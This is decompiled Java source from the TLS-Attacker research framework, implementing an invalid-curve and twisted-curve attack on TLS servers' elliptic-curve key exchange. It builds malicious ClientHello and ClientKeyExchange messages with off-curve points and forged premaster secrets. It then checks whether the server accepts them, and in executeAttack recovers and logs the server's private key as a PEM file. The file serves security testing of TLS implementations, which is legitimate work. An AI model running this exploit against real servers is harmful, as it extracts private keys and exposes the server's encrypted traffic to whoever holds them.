/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.impl;

import de.rub.nds.modifiablevariable.ModifiableVariableFactory;
import de.rub.nds.modifiablevariable.bytearray.ByteArrayModificationFactory;
import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.config.InvalidCurveAttackConfig;
import de.rub.nds.tlsattacker.attacks.ec.ICEAttacker;
import de.rub.nds.tlsattacker.attacks.ec.oracles.RealDirectMessageECOracle;
import de.rub.nds.tlsattacker.attacks.impl.Attacker;
import de.rub.nds.tlsattacker.attacks.task.InvalidCurveTask;
import de.rub.nds.tlsattacker.attacks.util.response.FingerprintSecretPair;
import de.rub.nds.tlsattacker.core.certificate.PemUtil;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.AlgorithmResolver;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.NamedGroup;
import de.rub.nds.tlsattacker.core.constants.ProtocolVersion;
import de.rub.nds.tlsattacker.core.constants.RunningModeType;
import de.rub.nds.tlsattacker.core.crypto.ec.CurveFactory;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurve;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurveOverFp;
import de.rub.nds.tlsattacker.core.crypto.ec.FieldElementFp;
import de.rub.nds.tlsattacker.core.crypto.ec.Point;
import de.rub.nds.tlsattacker.core.crypto.ec.PointFormatter;
import de.rub.nds.tlsattacker.core.crypto.ec.RFC7748Curve;
import de.rub.nds.tlsattacker.core.crypto.keys.CustomECPrivateKey;
import de.rub.nds.tlsattacker.core.protocol.message.ChangeCipherSpecMessage;
import de.rub.nds.tlsattacker.core.protocol.message.ClientHelloMessage;
import de.rub.nds.tlsattacker.core.protocol.message.ECDHClientKeyExchangeMessage;
import de.rub.nds.tlsattacker.core.protocol.message.FinishedMessage;
import de.rub.nds.tlsattacker.core.protocol.message.HandshakeMessage;
import de.rub.nds.tlsattacker.core.protocol.message.NewSessionTicketMessage;
import de.rub.nds.tlsattacker.core.protocol.message.extension.ExtensionMessage;
import de.rub.nds.tlsattacker.core.protocol.message.extension.KeyShareExtensionMessage;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.ParallelExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.action.ChangeDefaultPreMasterSecretAction;
import de.rub.nds.tlsattacker.core.workflow.action.GenericReceiveAction;
import de.rub.nds.tlsattacker.core.workflow.action.ReceiveAction;
import de.rub.nds.tlsattacker.core.workflow.action.ResetConnectionAction;
import de.rub.nds.tlsattacker.core.workflow.action.SendAction;
import de.rub.nds.tlsattacker.core.workflow.action.TlsAction;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
import de.rub.nds.tlsattacker.core.workflow.task.TlsTask;
import java.io.ByteArrayOutputStream;
import java.io.OutputStream;
import java.math.BigInteger;
import java.security.PrivateKey;
import java.util.LinkedList;
import java.util.List;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.bouncycastle.util.BigIntegers;

public class InvalidCurveAttacker
extends Attacker<InvalidCurveAttackConfig> {
    private static final Logger LOGGER = LogManager.getLogger();
    private BigInteger premasterSecret;
    private List<FingerprintSecretPair> responsePairs;
    private List<Point> receivedEcPublicKeys;
    private List<Point> finishedKeys;
    private final ParallelExecutor executor;
    private boolean dirtyKeysWarning;

    public InvalidCurveAttacker(InvalidCurveAttackConfig config, Config baseConfig) {
        super(config, baseConfig);
        this.executor = new ParallelExecutor(1, 3);
    }

    public InvalidCurveAttacker(InvalidCurveAttackConfig config, Config baseConfig, ParallelExecutor executor) {
        super(config, baseConfig);
        this.executor = executor;
    }

    @Override
    public void executeAttack() {
        Config tlsConfig = this.getTlsConfig();
        LOGGER.info("Executing attack against the server with named curve {}", (Object)tlsConfig.getDefaultSelectedNamedGroup().name());
        EllipticCurve curve = CurveFactory.getCurve(tlsConfig.getDefaultSelectedNamedGroup());
        RealDirectMessageECOracle oracle = new RealDirectMessageECOracle(tlsConfig, curve);
        ICEAttacker attacker = new ICEAttacker(oracle, ((InvalidCurveAttackConfig)this.config).getServerType(), ((InvalidCurveAttackConfig)this.config).getAdditionalEquations(), tlsConfig.getDefaultSelectedNamedGroup());
        BigInteger result = attacker.attack();
        LOGGER.info("Resulting plain private key: {}", (Object)result);
        String privateKeyFile = this.generatePrivateKeyFile(result, tlsConfig);
        LOGGER.info("Resulting encoded private key:");
        LOGGER.info(privateKeyFile);
    }

    @Override
    public Boolean isVulnerable() {
        Point point;
        EllipticCurve curve;
        if (!AlgorithmResolver.getKeyExchangeAlgorithm(this.getTlsConfig().getDefaultSelectedCipherSuite()).isEC()) {
            LOGGER.info("The CipherSuite that should be tested is not an Ec one:" + this.getTlsConfig().getDefaultSelectedCipherSuite().name());
            return null;
        }
        this.responsePairs = new LinkedList<FingerprintSecretPair>();
        this.receivedEcPublicKeys = new LinkedList<Point>();
        this.finishedKeys = new LinkedList<Point>();
        this.dirtyKeysWarning = false;
        if (((InvalidCurveAttackConfig)this.config).isCurveTwistAttack()) {
            BigInteger transformedX;
            curve = this.buildTwistedCurve();
            if (((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X25519 || ((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X448) {
                RFC7748Curve rfcCurve = (RFC7748Curve)CurveFactory.getCurve(((InvalidCurveAttackConfig)this.config).getNamedGroup());
                Point montgPoint = rfcCurve.getPoint(((InvalidCurveAttackConfig)this.config).getPublicPointBaseX(), ((InvalidCurveAttackConfig)this.config).getPublicPointBaseY());
                Point weierPoint = rfcCurve.toWeierstrass(montgPoint);
                transformedX = weierPoint.getX().getData().multiply(((InvalidCurveAttackConfig)this.config).getCurveTwistD()).mod(curve.getModulus());
            } else {
                transformedX = ((InvalidCurveAttackConfig)this.config).getPublicPointBaseX().multiply(((InvalidCurveAttackConfig)this.config).getCurveTwistD()).mod(curve.getModulus());
            }
            point = Point.createPoint(transformedX, ((InvalidCurveAttackConfig)this.config).getPublicPointBaseY(), ((InvalidCurveAttackConfig)this.config).getNamedGroup());
        } else {
            curve = CurveFactory.getCurve(((InvalidCurveAttackConfig)this.config).getNamedGroup());
            point = Point.createPoint(((InvalidCurveAttackConfig)this.config).getPublicPointBaseX(), ((InvalidCurveAttackConfig)this.config).getPublicPointBaseY(), ((InvalidCurveAttackConfig)this.config).getNamedGroup());
        }
        int protocolFlows = ((InvalidCurveAttackConfig)this.getConfig()).getProtocolFlows();
        if (((InvalidCurveAttackConfig)this.config).getPremasterSecret() != null) {
            protocolFlows = 1;
        }
        LinkedList<TlsTask> taskList = new LinkedList<TlsTask>();
        for (int i = 1; i <= protocolFlows; ++i) {
            this.setPremasterSecret(curve, i, point);
            InvalidCurveTask taskToAdd = new InvalidCurveTask(this.buildState(), this.executor.getReexecutions(), i);
            taskList.add(taskToAdd);
        }
        this.executor.bulkExecuteTasks(taskList);
        return this.evaluateExecutedTasks(taskList);
    }

    private void setPremasterSecret(EllipticCurve curve, int i, Point point) {
        if (((InvalidCurveAttackConfig)this.config).getPremasterSecret() != null) {
            this.premasterSecret = ((InvalidCurveAttackConfig)this.config).getPremasterSecret();
        } else {
            Point sharedPoint;
            BigInteger secret = new BigInteger("" + i);
            if (((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X25519 || ((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X448) {
                RFC7748Curve rfcCurve = (RFC7748Curve)CurveFactory.getCurve(((InvalidCurveAttackConfig)this.config).getNamedGroup());
                secret = rfcCurve.decodeScalar(secret);
            }
            if ((sharedPoint = curve.mult(secret, point)).getX() == null) {
                this.premasterSecret = BigInteger.ZERO;
            } else {
                RFC7748Curve rfcCurve;
                this.premasterSecret = sharedPoint.getX().getData();
                if (((InvalidCurveAttackConfig)this.config).isCurveTwistAttack()) {
                    this.premasterSecret = this.premasterSecret.multiply(((InvalidCurveAttackConfig)this.config).getCurveTwistD().modInverse(curve.getModulus())).mod(curve.getModulus());
                    if (((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X25519 || ((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X448) {
                        rfcCurve = (RFC7748Curve)CurveFactory.getCurve(((InvalidCurveAttackConfig)this.config).getNamedGroup());
                        Point weierPoint = rfcCurve.getPoint(this.premasterSecret, sharedPoint.getY().getData());
                        Point montPoint = rfcCurve.toMontgomery(weierPoint);
                        this.premasterSecret = montPoint.getX().getData();
                    }
                }
                if (((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X25519 || ((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X448) {
                    rfcCurve = (RFC7748Curve)CurveFactory.getCurve(((InvalidCurveAttackConfig)this.config).getNamedGroup());
                    this.premasterSecret = new BigInteger(1, rfcCurve.encodeCoordinate(this.premasterSecret));
                }
            }
            LOGGER.debug("PMS for scheduled Workflow Trace with secret " + i + ": " + this.premasterSecret.toString());
        }
    }

    private State buildState() {
        Config tlsConfig = this.getTlsConfig();
        EllipticCurve curve = CurveFactory.getCurve(((InvalidCurveAttackConfig)this.config).getNamedGroup());
        ModifiableByteArray serializedPublicKey = ModifiableVariableFactory.createByteArrayModifiableVariable();
        Point basepoint = new Point(new FieldElementFp(((InvalidCurveAttackConfig)this.config).getPublicPointBaseX(), curve.getModulus()), new FieldElementFp(((InvalidCurveAttackConfig)this.config).getPublicPointBaseY(), curve.getModulus()));
        byte[] serialized = curve instanceof RFC7748Curve ? ((RFC7748Curve)curve).encodeCoordinate(basepoint.getX().getData()) : PointFormatter.formatToByteArray(((InvalidCurveAttackConfig)this.config).getNamedGroup(), basepoint, ((InvalidCurveAttackConfig)this.config).getPointCompressionFormat());
        serializedPublicKey.setModification(ByteArrayModificationFactory.explicitValue((byte[])serialized));
        ModifiableByteArray pms = ModifiableVariableFactory.createByteArrayModifiableVariable();
        byte[] explicitPMS = BigIntegers.asUnsignedByteArray((int)ArrayConverter.bigIntegerToByteArray((BigInteger)curve.getModulus()).length, (BigInteger)this.premasterSecret);
        pms.setModification(ByteArrayModificationFactory.explicitValue((byte[])explicitPMS));
        tlsConfig.setWorkflowExecutorShouldClose(false);
        Config individualConfig = tlsConfig.createCopy();
        WorkflowTrace trace = ((InvalidCurveAttackConfig)this.config).isAttackInRenegotiation() ? this.prepareRenegotiationTrace(serializedPublicKey, pms, explicitPMS, individualConfig) : this.prepareRegularTrace(serializedPublicKey, pms, explicitPMS, individualConfig);
        State state = new State(individualConfig, trace);
        return state;
    }

    private WorkflowTrace prepareRegularTrace(ModifiableByteArray serializedPublicKey, ModifiableByteArray pms, byte[] explicitPMS, Config individualConfig) {
        if (individualConfig.getHighestProtocolVersion() != ProtocolVersion.TLS13) {
            individualConfig.setDefaultSelectedCipherSuite(individualConfig.getDefaultClientSupportedCiphersuites().get(0));
        }
        WorkflowTrace trace = new WorkflowConfigurationFactory(individualConfig).createWorkflowTrace(WorkflowTraceType.HELLO, RunningModeType.CLIENT);
        if (individualConfig.getHighestProtocolVersion().isTLS13()) {
            trace.removeTlsAction(trace.getTlsActions().size() - 1);
            trace.addTlsAction(new GenericReceiveAction());
            ClientHelloMessage cHello = (ClientHelloMessage)WorkflowTraceUtil.getFirstSendMessage(HandshakeMessageType.CLIENT_HELLO, trace);
            for (ExtensionMessage ext : cHello.getExtensions()) {
                if (!(ext instanceof KeyShareExtensionMessage)) continue;
                KeyShareExtensionMessage ksExt = (KeyShareExtensionMessage)ext;
                ksExt.getKeyShareList().get(0).setPublicKey(serializedPublicKey);
            }
            individualConfig.setDefaultPreMasterSecret(explicitPMS);
        } else {
            trace.addTlsAction(new SendAction(new ECDHClientKeyExchangeMessage(individualConfig), new ChangeCipherSpecMessage(individualConfig), new FinishedMessage(individualConfig)));
            trace.addTlsAction(new GenericReceiveAction());
            ECDHClientKeyExchangeMessage message = (ECDHClientKeyExchangeMessage)WorkflowTraceUtil.getFirstSendMessage(HandshakeMessageType.CLIENT_KEY_EXCHANGE, trace);
            message.setPublicKey(serializedPublicKey);
            message.prepareComputations();
            message.getComputations().setPremasterSecret(pms);
        }
        return trace;
    }

    private WorkflowTrace prepareRenegotiationTrace(ModifiableByteArray serializedPublicKey, ModifiableByteArray pms, byte[] explicitPMS, Config individualConfig) {
        WorkflowTrace trace;
        if (individualConfig.getHighestProtocolVersion().isTLS13()) {
            trace = new WorkflowConfigurationFactory(individualConfig).createWorkflowTrace(WorkflowTraceType.HANDSHAKE, RunningModeType.CLIENT);
            trace.addTlsAction(new ReceiveAction(ReceiveAction.ReceiveOption.CHECK_ONLY_EXPECTED, new NewSessionTicketMessage(false)));
            trace.addTlsAction(new ResetConnectionAction());
            ChangeDefaultPreMasterSecretAction noPMS = new ChangeDefaultPreMasterSecretAction();
            noPMS.setNewValue(new byte[0]);
            trace.getTlsActions().add(0, noPMS);
            individualConfig.setAddPreSharedKeyExtension(Boolean.TRUE);
            WorkflowTrace secondHandshake = this.prepareRegularTrace(serializedPublicKey, pms, explicitPMS, individualConfig);
            individualConfig.setAddPreSharedKeyExtension(Boolean.FALSE);
            ChangeDefaultPreMasterSecretAction cPMS = new ChangeDefaultPreMasterSecretAction();
            cPMS.setNewValue(explicitPMS);
            trace.addTlsAction(cPMS);
            for (TlsAction action : secondHandshake.getTlsActions()) {
                trace.addTlsAction(action);
            }
        } else {
            individualConfig.setDefaultSelectedCipherSuite(individualConfig.getDefaultClientSupportedCiphersuites().get(0));
            trace = new WorkflowConfigurationFactory(individualConfig).createWorkflowTrace(WorkflowTraceType.CLIENT_RENEGOTIATION_WITHOUT_RESUMPTION, RunningModeType.CLIENT);
            ECDHClientKeyExchangeMessage message = (ECDHClientKeyExchangeMessage)WorkflowTraceUtil.getLastSendMessage(HandshakeMessageType.CLIENT_KEY_EXCHANGE, trace);
            message.setPublicKey(serializedPublicKey);
            message.prepareComputations();
            message.getComputations().setPremasterSecret(pms);
            trace.removeTlsAction(trace.getTlsActions().size() - 1);
            trace.addTlsAction(new GenericReceiveAction());
        }
        return trace;
    }

    public List<Point> getReceivedEcPublicKeys() {
        return this.receivedEcPublicKeys;
    }

    private EllipticCurveOverFp buildTwistedCurve() {
        EllipticCurveOverFp intendedCurve = ((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X25519 || ((InvalidCurveAttackConfig)this.config).getNamedGroup() == NamedGroup.ECDH_X448 ? ((RFC7748Curve)CurveFactory.getCurve(((InvalidCurveAttackConfig)this.config).getNamedGroup())).getWeierstrassEquivalent() : (EllipticCurveOverFp)CurveFactory.getCurve(((InvalidCurveAttackConfig)this.config).getNamedGroup());
        BigInteger modA = intendedCurve.getA().getData().multiply(((InvalidCurveAttackConfig)this.config).getCurveTwistD().pow(2)).mod(intendedCurve.getModulus());
        BigInteger modB = intendedCurve.getB().getData().multiply(((InvalidCurveAttackConfig)this.config).getCurveTwistD().pow(3)).mod(intendedCurve.getModulus());
        EllipticCurveOverFp twistedCurve = new EllipticCurveOverFp(modA, modB, intendedCurve.getModulus());
        ((InvalidCurveAttackConfig)this.config).setTwistedCurve(twistedCurve);
        return twistedCurve;
    }

    private Boolean evaluateExecutedTasks(List<TlsTask> taskList) {
        boolean foundExecutedAsPlanned = false;
        boolean foundServerFinished = false;
        boolean tookKeyFromSuccessfullTrace = false;
        boolean tookKeyFromUnsuccessfullTrace = false;
        for (TlsTask tlsTask : taskList) {
            InvalidCurveTask task = (InvalidCurveTask)tlsTask;
            WorkflowTrace trace = task.getState().getWorkflowTrace();
            if (!task.isHasError()) {
                foundExecutedAsPlanned = true;
                if (WorkflowTraceUtil.getLastReceivedMessage(trace) == null || !WorkflowTraceUtil.getLastReceivedMessage(trace).isHandshakeMessage() || ((HandshakeMessage)WorkflowTraceUtil.getLastReceivedMessage(trace)).getHandshakeMessageType() != HandshakeMessageType.FINISHED) {
                    LOGGER.info("Received no finished Message using secret" + task.getAppliedSecret());
                } else {
                    LOGGER.info("Received a finished Message using secret: " + task.getAppliedSecret() + "! Server is vulnerable!");
                    this.finishedKeys.add(task.getReceivedEcKey());
                    foundServerFinished = true;
                }
                if (task.getReceivedEcKey() != null) {
                    tookKeyFromSuccessfullTrace = true;
                    this.getReceivedEcPublicKeys().add(task.getReceivedEcKey());
                }
            } else if (task.getReceivedEcKey() != null) {
                tookKeyFromUnsuccessfullTrace = true;
                this.getReceivedEcPublicKeys().add(task.getReceivedEcKey());
            }
            this.responsePairs.add(new FingerprintSecretPair(task.getFingerprint(), task.getAppliedSecret()));
        }
        if (((InvalidCurveAttackConfig)this.config).isAttackInRenegotiation() && tookKeyFromSuccessfullTrace && tookKeyFromUnsuccessfullTrace) {
            this.dirtyKeysWarning = true;
        }
        if (foundExecutedAsPlanned) {
            if (foundServerFinished) {
                return true;
            }
            return false;
        }
        return null;
    }

    private String generatePrivateKeyFile(BigInteger result, Config tlsConfig) {
        CustomECPrivateKey key = new CustomECPrivateKey(result, tlsConfig.getDefaultSelectedNamedGroup());
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        PemUtil.writePrivateKey((PrivateKey)key, (OutputStream)baos);
        return new String(baos.toByteArray());
    }

    public List<FingerprintSecretPair> getResponsePairs() {
        return this.responsePairs;
    }

    public void setResponsePairs(List<FingerprintSecretPair> responsePairs) {
        this.responsePairs = responsePairs;
    }

    public boolean isDirtyKeysWarning() {
        return this.dirtyKeysWarning;
    }

    public List<Point> getFinishedKeys() {
        return this.finishedKeys;
    }
}

